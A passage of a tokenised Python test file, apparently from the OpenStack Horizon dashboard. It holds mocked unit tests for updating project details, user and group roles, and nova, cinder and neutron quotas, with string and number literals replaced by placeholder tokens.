get_disabled_quotas ( IsA ( http . HttpRequest ) ) . AndReturn ( self . disabled_quotas . first ( ) ) <EOL> if neutron : <EOL> quotas . get_disabled_quotas ( IsA ( http . HttpRequest ) ) . AndReturn ( self . disabled_quotas . first ( ) ) <EOL> quotas . get_tenant_quota_data ( IsA ( http . HttpRequest ) , <EOL> tenant_id = self . tenant . id ) . AndReturn ( quota ) <EOL> api . keystone . get_default_role ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( default_role ) <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( users ) <EOL> api . keystone . role_list ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( roles ) <EOL> api . keystone . group_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( groups ) <EOL> workflow_data = { } <EOL> if keystone_api_version >= <NUM_LIT:3> : <EOL> api . keystone . role_assignments_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . AndReturn ( role_assignments ) <EOL> else : <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . AndReturn ( proj_users ) <EOL> for user in proj_users : <EOL> api . keystone . roles_for_user ( IsA ( http . HttpRequest ) , <EOL> user . id , <EOL> self . tenant . id ) . AndReturn ( roles ) <EOL> api . keystone . role_assignments_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . AndReturn ( role_assignments ) <EOL> workflow_data [ USER_ROLE_PREFIX + "<STR_LIT:1>" ] = [ '<STR_LIT:3>' ] <EOL> workflow_data [ USER_ROLE_PREFIX + "<STR_LIT:2>" ] = [ '<STR_LIT:2>' ] <EOL> workflow_data [ GROUP_ROLE_PREFIX + "<STR_LIT:1>" ] = [ '<STR_LIT:3>' ] <EOL> workflow_data [ GROUP_ROLE_PREFIX + "<STR_LIT:2>" ] = [ '<STR_LIT:2>' ] <EOL> project . _info [ "<STR_LIT>" ] = domain_id <EOL> project . _info [ "<STR_LIT:name>" ] = "<STR_LIT>" <EOL> project . _info [ "<STR_LIT:description>" ] = "<STR_LIT>" <EOL> quota . metadata_items = <NUM_LIT> <EOL> quota . volumes = <NUM_LIT> <EOL> updated_project = { "<STR_LIT:name>" : project . _info [ "<STR_LIT:name>" ] , <EOL> "<STR_LIT:description>" : project . _info [ "<STR_LIT:description>" ] , <EOL> "<STR_LIT>" : project . enabled } <EOL> updated_quota = self . _get_quota_info ( quota ) <EOL> api . keystone . tenant_update ( IsA ( http . HttpRequest ) , <EOL> project . id , <EOL> ** updated_project ) . AndReturn ( project ) <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . AndReturn ( proj_users ) <EOL> api . keystone . roles_for_user ( IsA ( http . HttpRequest ) , '<STR_LIT:1>' , <EOL> self . tenant . id ) . AndReturn ( roles ) <EOL> api . keystone . roles_for_user ( IsA ( http . HttpRequest ) , '<STR_LIT:2>' , <EOL> self . tenant . id ) . AndReturn ( ( roles [ <NUM_LIT:0> ] , ) ) <EOL> api . keystone . remove_tenant_user_role ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id , <EOL> user = '<STR_LIT:2>' , <EOL> role = '<STR_LIT:1>' ) <EOL> api . keystone . add_tenant_user_role ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id , <EOL> user = '<STR_LIT:2>' , <EOL> role = '<STR_LIT:2>' ) <EOL> api . keystone . roles_for_user ( IsA ( http . HttpRequest ) , '<STR_LIT:3>' , <EOL> self . tenant . id ) . AndReturn ( ( roles [ <NUM_LIT:1> ] , ) ) <EOL> api . keystone . remove_tenant_user_role ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id , <EOL> user = '<STR_LIT:3>' , <EOL> role = '<STR_LIT:2>' ) <EOL> api . keystone . add_tenant_user_role ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id , <EOL> user = '<STR_LIT:3>' , <EOL> role = '<STR_LIT:1>' ) <EOL> api . keystone . group_list ( IsA ( http . HttpRequest ) , <EOL> domain = domain_id , <EOL> project = self . tenant . id ) . AndReturn ( proj_groups ) <EOL> api . keystone . roles_for_group ( IsA ( http . HttpRequest ) , <EOL> group = '<STR_LIT:1>' , <EOL> project = self . tenant . id ) . AndReturn ( roles ) <EOL> for role in roles : <EOL> api . keystone . remove_group_role ( IsA ( http . HttpRequest ) , <EOL> role = role . id , <EOL> group = '<STR_LIT:1>' , <EOL> project = self . tenant . id ) <EOL> api . keystone . roles_for_group ( IsA ( http . HttpRequest ) , <EOL> group = '<STR_LIT:2>' , <EOL> project = self . tenant . id ) . AndReturn ( ( roles [ <NUM_LIT:0> ] , ) ) <EOL> api . keystone . remove_group_role ( IsA ( http . HttpRequest ) , <EOL> role = '<STR_LIT:1>' , <EOL> group = '<STR_LIT:2>' , <EOL> project = self . tenant . id ) <EOL> api . keystone . add_group_role ( IsA ( http . HttpRequest ) , <EOL> role = '<STR_LIT:2>' , <EOL> group = '<STR_LIT:2>' , <EOL> project = self . tenant . id ) <EOL> api . keystone . roles_for_group ( IsA ( http . HttpRequest ) , <EOL> group = '<STR_LIT:3>' , <EOL> project = self . tenant . id ) . AndReturn ( ( roles [ <NUM_LIT:1> ] , ) ) <EOL> api . keystone . remove_group_role ( IsA ( http . HttpRequest ) , <EOL> role = '<STR_LIT:2>' , <EOL> group = '<STR_LIT:3>' , <EOL> project = self . tenant . id ) <EOL> api . keystone . add_group_role ( IsA ( http . HttpRequest ) , <EOL> role = '<STR_LIT:1>' , <EOL> group = '<STR_LIT:3>' , <EOL> project = self . tenant . id ) <EOL> quotas . tenant_quota_usages ( IsA ( http . HttpRequest ) , tenant_id = project . id ) . AndReturn ( quota_usages ) <EOL> nova_updated_quota = dict ( [ ( key , updated_quota [ key ] ) for key in <EOL> quotas . NOVA_QUOTA_FIELDS ] ) <EOL> api . nova . tenant_quota_update ( IsA ( http . HttpRequest ) , <EOL> project . id , <EOL> ** nova_updated_quota ) <EOL> cinder_updated_quota = dict ( [ ( key , updated_quota [ key ] ) for key in <EOL> quotas . CINDER_QUOTA_FIELDS ] ) <EOL> api . cinder . tenant_quota_update ( IsA ( http . HttpRequest ) , <EOL> project . id , <EOL> ** cinder_updated_quota ) <EOL> self . mox . ReplayAll ( ) <EOL> project_data = { "<STR_LIT>" : project . _info [ "<STR_LIT>" ] , <EOL> "<STR_LIT:name>" : project . _info [ "<STR_LIT:name>" ] , <EOL> "<STR_LIT:id>" : project . id , <EOL> "<STR_LIT:description>" : project . _info [ "<STR_LIT:description>" ] , <EOL> "<STR_LIT>" : project . enabled } <EOL> workflow_data . update ( project_data ) <EOL> workflow_data . update ( updated_quota ) <EOL> url = reverse ( '<STR_LIT>' , <EOL> args = [ self . tenant . id ] ) <EOL> res = self . client . post ( url , workflow_data ) <EOL> self . assertNoFormErrors ( res ) <EOL> self . assertMessageCount ( error = <NUM_LIT:0> , warning = <NUM_LIT:1> ) <EOL> self . assertRedirectsNoFollow ( res , INDEX_URL ) <EOL> @ test . create_stubs ( { api . neutron : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) <EOL> @ test . update_settings ( OPENSTACK_NEUTRON_NETWORK = { '<STR_LIT>' : True } ) <EOL> def test_update_project_save_with_neutron ( self ) : <EOL> quota_data = self . neutron_quotas . first ( ) <EOL> neutron_updated_quota = dict ( [ ( key , quota_data . get ( key ) . limit ) <EOL> for key in quotas . NEUTRON_QUOTA_FIELDS ] ) <EOL> api . neutron . is_extension_supported ( IsA ( http . HttpRequest ) , '<STR_LIT>' ) . MultipleTimes ( ) . AndReturn ( True ) <EOL> api . neutron . tenant_quota_get ( IsA ( http . HttpRequest ) , <EOL> tenant_id = self . tenant . id ) . AndReturn ( quota_data ) <EOL> api . neutron . tenant_quota_update ( IsA ( http . HttpRequest ) , <EOL> self . tenant . id , <EOL> ** neutron_updated_quota ) <EOL> self . test_update_project_save ( neutron = True ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , ) } ) <EOL> def test_update_project_get_error ( self ) : <EOL> api . keystone . tenant_get ( IsA ( http . HttpRequest ) , self . tenant . id , <EOL> admin = True ) . AndRaise ( self . exceptions . nova ) <EOL> self . mox . ReplayAll ( ) <EOL> url = reverse ( '<STR_LIT>' , <EOL> args = [ self . tenant . id ] ) <EOL> res = self . client . get ( url ) <EOL> self . assertRedirectsNoFollow ( res , INDEX_URL ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> quotas : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , ) , <EOL> api . nova : ( '<STR_LIT>' , ) } ) <EOL> def test_update_project_tenant_update_error ( self ) : <EOL> keystone_api_version = api . keystone . VERSIONS . active <EOL> project = self . tenants . first ( ) <EOL> quota = self . quotas . first ( ) <EOL> default_role = self . roles . first ( ) <EOL> domain_id = project . domain_id <EOL> users = self . _get_all_users ( domain_id ) <EOL> groups = self . _get_all_groups ( domain_id ) <EOL> roles = self . roles . list ( ) <EOL> proj_users = self . _get_proj_users ( project . id ) <EOL> role_assignments = self . role_assignments . list ( ) <EOL> quota_usages = self . quota_usages . first ( ) <EOL> api . keystone . tenant_get ( IsA ( http . HttpRequest ) , self . tenant . id , <EOL> admin = True ) . AndReturn ( project ) <EOL> api . keystone . domain_get ( IsA ( http . HttpRequest ) , domain_id ) . AndReturn ( self . domain ) <EOL> quotas . get_disabled_quotas ( IsA ( http . HttpRequest ) ) . AndReturn ( self . disabled_quotas . first ( ) ) <EOL> quotas . get_tenant_quota_data ( IsA ( http . HttpRequest ) , <EOL> tenant_id = self . tenant . id ) . AndReturn ( quota ) <EOL> api . keystone . get_default_role ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( default_role ) <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( users ) <EOL> api . keystone . role_list ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( roles ) <EOL> api . keystone . group_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( groups ) <EOL> workflow_data = { } <EOL> if keystone_api_version >= <NUM_LIT:3> : <EOL> api . keystone . role_assignments_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . AndReturn ( role_assignments ) <EOL> else : <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . AndReturn ( proj_users ) <EOL> for user in proj_users : <EOL> api . keystone . roles_for_user ( IsA ( http . HttpRequest ) , <EOL> user . id , <EOL> self . tenant . id ) . AndReturn ( roles ) <EOL> role_ids = [ role . id for role in roles ] <EOL> for user in proj_users : <EOL> if role_ids : <EOL> workflow_data . setdefault ( USER_ROLE_PREFIX + role_ids [ <NUM_LIT:0> ] , [ ] ) . append ( user . id ) <EOL> api . keystone . role_assignments_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . AndReturn ( role_assignments ) <EOL> role_ids = [ role . id for role in roles ] <EOL> for group in groups : <EOL> if role_ids : <EOL> workflow_data . setdefault ( GROUP_ROLE_PREFIX + role_ids [ <NUM_LIT:0> ] , [ ] ) . append ( group . id ) <EOL> project . _info [ "<STR_LIT>" ] = domain_id <EOL> project . _info [ "<STR_LIT:name>" ] = "<STR_LIT>" <EOL> project . _info [ "<STR_LIT:description>" ] = "<STR_LIT>" <EOL> quota . metadata_items = <NUM_LIT> <EOL> quota . volumes = <NUM_LIT> <EOL> updated_project = { "<STR_LIT:name>" : project . _info [ "<STR_LIT:name>" ] , <EOL> "<STR_LIT:description>" : project . _info [ "<STR_LIT:description>" ] , <EOL> "<STR_LIT>" : project . enabled } <EOL> updated_quota = self . _get_quota_info ( quota ) <EOL> quotas . tenant_quota_usages ( IsA ( http . HttpRequest ) , tenant_id = project . id ) . AndReturn ( quota_usages ) <EOL> api . keystone . tenant_update ( IsA ( http . HttpRequest ) , <EOL> project . id , <EOL> ** updated_project ) . AndRaise ( self . exceptions . keystone ) <EOL> self . mox . ReplayAll ( ) <EOL> project_data = { "<STR_LIT>" : project . _info [ "<STR_LIT>" ] , <EOL> "<STR_LIT:name>" : project . _info [ "<STR_LIT:name>" ] , <EOL> "<STR_LIT:id>" : project . id , <EOL> "<STR_LIT:description>" : project . _info [ "<STR_LIT:description>" ] , <EOL> "<STR_LIT>" : project . enabled } <EOL> workflow_data . update ( project_data ) <EOL> workflow_data . update ( updated_quota ) <EOL> url = reverse ( '<STR_LIT>' , <EOL> args = [ self . tenant . id ] ) <EOL> res = self . client . post ( url , workflow_data ) <EOL> self . assertNoFormErrors ( res ) <EOL> self . assertRedirectsNoFollow ( res , INDEX_URL ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> quotas : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , ) , <EOL> api . nova : ( '<STR_LIT>' , ) } ) <EOL> def test_update_project_quota_update_error ( self ) : <EOL> keystone_api_version = api . keystone . VERSIONS . active <EOL> project = self . tenants . first ( ) <EOL> quota = self . quotas . first ( ) <EOL> default_role = self . roles . first ( ) <EOL> domain_id = project . domain_id <EOL> users = self . _get_all_users ( domain_id ) <EOL> proj_users = self . _get_proj_users ( project . id ) <EOL> groups = self . _get_all_groups ( domain_id ) <EOL> proj_groups = self . _get_proj_groups ( project . id ) <EOL> roles = self . roles . list ( ) <EOL> role_assignments = self . _get_proj_role_assignment ( project . id ) <EOL> quota_usages = self . quota_usages . first ( ) <EOL> api . keystone . tenant_get ( IsA ( http . HttpRequest ) , self . tenant . id , <EOL> admin = True ) . AndReturn ( project ) <EOL> api . keystone . domain_get ( IsA ( http . HttpRequest ) , domain_id ) . AndReturn ( self . domain ) <EOL> quotas . get_disabled_quotas ( IsA ( http . HttpRequest ) ) . AndReturn ( self . disabled_quotas . first ( ) ) <EOL> quotas . get_tenant_quota_data ( IsA ( http . HttpRequest ) , <EOL> tenant_id = self . tenant . id ) . AndReturn ( quota ) <EOL> api . keystone . get_default_role ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( default_role ) <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( users ) <EOL> api . keystone . role_list ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( roles ) <EOL> api . keystone . group_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( groups ) <EOL> workflow_data = { } <EOL> if keystone_api_version >= <NUM_LIT:3> : <EOL> api . keystone . role_assignments_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . AndReturn ( role_assignments ) <EOL> else : <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . AndReturn ( proj_users ) <EOL> for user in proj_users : <EOL> api . keystone . roles_for_user ( IsA ( http . HttpRequest ) , <EOL> user . id , <EOL> self . tenant . id ) . AndReturn ( roles ) <EOL> api . keystone . role_assignments_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . AndReturn ( role_assignments ) <EOL> workflow_data [ USER_ROLE_PREFIX + "<STR_LIT:1>" ] = [ '<STR_LIT:1>' , '<STR_LIT:3>' ] <EOL> workflow_data [ USER_ROLE_PREFIX + "<STR_LIT:2>" ] = [ '<STR_LIT:1>' , '<STR_LIT:2>' , '<STR_LIT:3>' ] <EOL> workflow_data [ GROUP_ROLE_PREFIX + "<STR_LIT:1>" ] = [ '<STR_LIT:1>' , '<STR_LIT:3>' ] <EOL> workflow_data [ GROUP_ROLE_PREFIX + "<STR_LIT:2>" ] = [ '<STR_LIT:1>' , '<STR_LIT:2>' , '<STR_LIT:3>' ] <EOL> project . _info [ "<STR_LIT>" ] = domain_id <EOL> project . _info [ "<STR_LIT:name>" ] = "<STR_LIT>" <EOL> project . _info [ "<STR_LIT:description>" ] = "<STR_LIT>" <EOL> quota [ <NUM_LIT:0> ] . limit = <NUM_LIT> <EOL> quota [ <NUM_LIT:1> ] . limit = - <NUM_LIT:1> <EOL> updated_project = { "<STR_LIT:name>" : project . _info [ "<STR_LIT:name>" ] , <EOL> "<STR_LIT:description>" : project . _info [ "<STR_LIT:description>" ] , <EOL> "<STR_LIT>" : project . enabled } <EOL> updated_quota = self . _get_quota_info ( quota ) <EOL> api . keystone . tenant_update ( IsA ( http . HttpRequest ) , <EOL> project . id , <EOL> ** updated_project ) . AndReturn ( project ) <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . AndReturn ( proj_users ) <EOL> api . keystone . roles_for_user ( IsA ( http . HttpRequest ) , '<STR_LIT:1>' , <EOL> self . tenant . id ) . AndReturn ( roles ) <EOL> api . keystone . roles_for_user ( IsA ( http . HttpRequest ) , '<STR_LIT:2>' , <EOL> self . tenant . id ) . AndReturn ( ( roles [ <NUM_LIT:1> ] , ) ) <EOL> api . keystone . roles_for_user ( IsA ( http . HttpRequest ) , '<STR_LIT:3>' , <EOL> self . tenant . id ) . AndReturn ( ( roles [ <NUM_LIT:0> ] , ) ) <EOL> api . keystone . add_tenant_user_role ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id , <EOL> user = '<STR_LIT:3>' , <EOL> role = '<STR_LIT:2>' ) <EOL> api . keystone . group_list ( IsA ( http . HttpRequest ) , <EOL> domain = domain_id , <EOL> project = self . tenant . id ) . AndReturn ( proj_groups ) <EOL> api . keystone . roles_for_group ( IsA ( http . HttpRequest ) , <EOL> group = '<STR_LIT:1>' , <EOL> project = self . tenant . id ) . AndReturn ( roles ) <EOL> api . keystone . roles_for_group ( IsA ( http . HttpRequest ) , <EOL> group = '<STR_LIT:2>' , <EOL> project = self . tenant . id ) . AndReturn ( ( roles [ <NUM_LIT:1> ] , ) ) <EOL> api . keystone . roles_for_group ( IsA ( http . HttpRequest ) , <EOL> group = '<STR_LIT:3>' , <EOL> project = self . tenant . id ) . AndReturn ( ( roles [ <NUM_LIT:0> ] , ) ) <EOL> api . keystone . add_group_role ( IsA ( http . HttpRequest ) , <EOL> role = '<STR_LIT:2>' , <EOL> group = '<STR_LIT:3>' , <EOL> project = self . tenant . id ) <EOL> quotas . tenant_quota_usages ( IsA ( http . HttpRequest ) , tenant_id = project . id ) . AndReturn ( quota_usages ) <EOL> nova_updated_quota = dict ( [ ( key , updated_quota [ key ] ) for key in <EOL> quotas . NOVA_QUOTA_FIELDS ] ) <EOL> api . nova . tenant_quota_update ( IsA ( http . HttpRequest ) , <EOL> project . id , <EOL> ** nova_updated_quota ) . AndRaise ( self . exceptions . nova ) <EOL> self . mox . ReplayAll ( ) <EOL> project_data = { "<STR_LIT>" : project . _info [ "<STR_LIT>" ] , <EOL> "<STR_LIT:name>" : project . _info [ "<STR_LIT:name>" ] , <EOL> "<STR_LIT:id>" : project . id , <EOL> "<STR_LIT:description>" : project . _info [ "<STR_LIT:description>" ] , <EOL> "<STR_LIT>" : project . enabled } <EOL> workflow_data . update ( project_data ) <EOL> workflow_data . update ( updated_quota ) <EOL> url = reverse ( '<STR_LIT>' , <EOL> args = [ self . tenant . id ] ) <EOL> res = self . client . post ( url , workflow_data ) <EOL> self . assertNoFormErrors ( res ) <EOL> self . assertMessageCount ( error = <NUM_LIT:2> , warning = <NUM_LIT:0> ) <EOL> self . assertRedirectsNoFollow ( res , INDEX_URL ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> quotas : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) <EOL> def test_update_project_member_update_error ( self ) : <EOL> keystone_api_version = api . keystone . VERSIONS . active <EOL> project = self . tenants . first ( ) <EOL> quota = self . quotas . first ( ) <EOL> default_role = self . roles . first ( ) <EOL> domain_id = project . domain_id <EOL> users = self . _get_all_users ( domain_id ) <EOL> proj_users = self . _get_proj_users ( project . id ) <EOL> groups = self . _get_all_groups ( domain_id ) <EOL> roles = self . roles . list ( ) <EOL> role_assignments = self . _get_proj_role_assignment ( project . id ) <EOL> quota_usages = self . quota_usages . first ( ) <EOL> api . keystone . tenant_get ( IsA ( http . HttpRequest ) , self . tenant . id , <EOL> admin = True ) . AndReturn ( project ) <EOL> api . keystone . domain_get ( IsA ( http . HttpRequest ) , domain_id ) . AndReturn ( self . domain ) <EOL> quotas . get_disabled_quotas ( IsA ( http . HttpRequest ) ) . AndReturn ( self . disabled_quotas . first ( ) ) <EOL> quotas . get_tenant_quota_data ( IsA ( http . HttpRequest ) , <EOL> tenant_id = self . tenant . id ) . AndReturn ( quota ) <EOL> api . keystone . get_default_role ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( default_role ) <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( users ) <EOL> api . keystone . role_list ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( roles ) <EOL> api . keystone . group_list ( IsA ( http . HttpRequest ) , domain = domain_id ) . AndReturn ( groups ) <EOL> workflow_data = { } <EOL> if keystone_api_version >= <NUM_LIT:3> : <EOL> api . keystone . role_assignments_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . AndReturn ( role_assignments ) <EOL> else : <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . AndReturn ( proj_users ) <EOL> for user in proj_users : <EOL> api . keystone . roles_for_user ( IsA ( http . HttpRequest ) , <EOL> user . id , <EOL> self . tenant . id ) . AndReturn ( roles ) <EOL> api . keystone . role_assignments_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . AndReturn ( role_assignments ) <EOL> workflow_data [ USER_ROLE_PREFIX + "<STR_LIT:1>" ] = [ '<STR_LIT:1>' , '<STR_LIT:3>' ] <EOL> workflow_data [ USER_ROLE_PREFIX + "<STR_LIT:2>" ] = [ '<STR_LIT:1>' , '<STR_LIT:2>' , '<STR_LIT:3>' ] <EOL> workflow_data [ GROUP_ROLE_PREFIX + "<STR_LIT:1>" ] = [ '<STR_LIT:1>' , '<STR_LIT:3>' ] <EOL> workflow_data [ GROUP_ROLE_PREFIX + "<STR_LIT:2>" ] = [ '<STR_LIT:1>' , '<STR_LIT:2>' , '<STR_LIT:3>' ] <EOL> project . _info [ "<STR_LIT>" ] = domain_id <EOL> project . _info [ "<STR_LIT:name>" ] = "<STR_LIT>" <EOL> project . _info [ "<STR_LIT:description>" ] = "<STR_LIT>" <EOL> quota . metadata_items = <NUM_LIT> <EOL> quota . volumes = <NUM_LIT> <EOL> updated_project = { "<STR_LIT:name>" : project . _info [ "<STR_LIT:name>" ] , <EOL> "<STR_LIT:description>" : project . _info [ "<STR_LIT:description>" ] , <EOL> "<STR_LIT>" : project . enabled } <EOL> updated_quota = self . _get_quota_info ( quota ) <EOL> quotas . tenant_quota_usages ( IsA ( http . HttpRequest ) , tenant_id = project . id ) . AndReturn ( quota_usages ) <EOL> api . keystone . tenant_update ( IsA ( http . HttpRequest ) , <EOL> project . id , <EOL> ** updated_project ) . AndReturn ( project ) <EOL> api . keystone . user_list ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id ) . AndReturn ( proj_users ) <EOL> api . keystone . roles_for_user ( IsA ( http . HttpRequest ) , '<STR_LIT:1>' , <EOL> self . tenant . id ) . AndReturn ( roles ) <EOL> api . keystone . roles_for_user ( IsA ( http . HttpRequest ) , '<STR_LIT:2>' , <EOL> self . tenant . id ) . AndReturn ( ( roles [ <NUM_LIT:1> ] , ) ) <EOL> api . keystone . roles_for_user ( IsA ( http . HttpRequest ) , '<STR_LIT:3>' , <EOL> self . tenant . id ) . AndReturn ( ( roles [ <NUM_LIT:0> ] , ) ) <EOL> api . keystone . add_tenant_user_role ( IsA ( http . HttpRequest ) , <EOL> project = self . tenant . id , <EOL> user = '<STR_LIT:3>' , <EOL> role = '<STR_LIT:2>' ) . AndRaise ( self . exceptions . keystone ) <EOL> self . mox . ReplayAll ( ) <EOL> project_data = { "<STR_LIT>" : project . _info [ "<STR_LIT>" ] , <EOL> "<STR_LIT:name>" : project . _info [ "<STR_LIT:name>" ] , <EOL> "<STR_LIT:id>" : project . id , <EOL> "<STR_LIT:description>" : project . _info [ "<STR_LIT:description>" ] , <EOL> "<STR_LIT>" : project . enabled } <EOL> workflow_data . update ( project_data ) <EOL> workflow_data . update ( updated_quota ) <EOL> url = reverse ( '<STR_LIT>' , <EOL> args = [ self . tenant . id ] ) <EOL> res = self . client . post ( url , workflow_data ) <EOL> self . assertNoFormErrors ( res ) <EOL> self . assertMessageCount ( error = <NUM_LIT:2> , warning = <NUM_LIT:0> ) <EOL> self . assertRedirectsNoFollow ( res , INDEX_URL ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> quotas : ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) <EOL> def test_update_project_when_default_role_does_not_exist ( self ) : <EOL> project = self . tenants . first ( ) <EOL> domain_id = project . domain_id <EOL> quota = self . quotas . first ( ) <EOL> api . keystone . get_default_role ( IsA ( http . HttpRequest ) ) . MultipleTimes ( ) . AndReturn ( None ) <EOL> api . keystone . tenant_get ( IsA ( http . HttpRequest ) , self . tenant . id , <EOL> admin = True ) . AndReturn ( project ) <EOL> api . keystone . domain_get ( IsA ( http . HttpRequest ) , domain_id ) . AndReturn ( self . domain ) <EOL> quotas . get_disabled_quotas ( IsA ( http . HttpRequest ) ) . AndReturn ( self . disabled_quotas . first ( ) ) <EOL> quotas . get_tenant_quota_data ( IsA ( http . HttpRequest ) , <EOL> tenant_id = self . tenant . id ) . AndReturn ( quota ) <EOL> self . mox . ReplayAll ( ) <EOL> url = reverse ( '<STR_LIT>' , <EOL> args = [ self . tenant . id ] ) <EOL> try : <EOL> logging . disable ( logging . ERROR ) <EOL> with self . assertRaises ( exceptions . NotFound ) : <EOL> self . client . get ( url ) <EOL> finally : <EOL> logging . disable ( logging . NOTSET ) <EOL> class UsageViewTests ( test . BaseAdminViewTests ) : <EOL> def _stub_nova_api_calls ( self , nova_stu_enabled = True ) : <EOL> self . mox . StubOutWithMock ( api . nova , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( api . nova , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( api . nova , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( api . cinder , '<STR_LIT>' ) <EOL> api . nova . extension_supported ( <EOL> '<STR_LIT>' , IsA ( http . HttpRequest ) ) . AndReturn ( nova_stu_enabled ) <EOL> def _stub_neutron_api_calls ( self , neutron_sg_enabled = True ) : <EOL> self . mox . StubOutWithMock ( api . neutron , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( api . network , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( api . network , '<STR_LIT>' ) <EOL> if neutron_sg_enabled : <EOL> self . mox . StubOutWithMock ( api . network , '<STR_LIT>' ) <EOL> api . neutron . is_extension_supported ( <EOL> IsA ( http . HttpRequest ) , <EOL> '<STR_LIT>' ) . AndReturn ( neutron_sg_enabled ) <EOL> api . network . floating_ip_supported ( IsA ( http . HttpRequest ) ) . AndReturn ( True ) <EOL> api . network . tenant_floating_ip_list ( IsA ( http . HttpRequest ) ) . AndReturn ( self . floating_ips . list ( ) ) <EOL> if neutron_sg_enabled : <EOL> api . network . security_group_list ( IsA ( http . HttpRequest ) ) . AndReturn ( self . q_secgroups . list ( ) ) <EOL> def test_usage_csv ( self ) : <EOL> self . _test_usage_csv ( nova_stu_enabled = True ) <EOL> def test_usage_csv_disabled ( self ) : <EOL> self . _test_usage_csv ( nova_stu_enabled = False ) <EOL> def _test_usage_csv ( self , nova_stu_enabled = True ) : <EOL> now = timezone . now ( ) <EOL> usage_obj = api . nova . NovaUsage ( self . usages . first ( ) ) <EOL> self . _stub_nova_api_calls ( nova_stu_enabled ) <EOL> api . nova . extension_supported ( <EOL> '<STR_LIT>' , IsA ( http . HttpRequest ) ) . AndReturn ( nova_stu_enabled ) <EOL> start = datetime . datetime ( now . year , now . month , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> end = datetime . datetime ( now . year , now . month , now . day , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> if 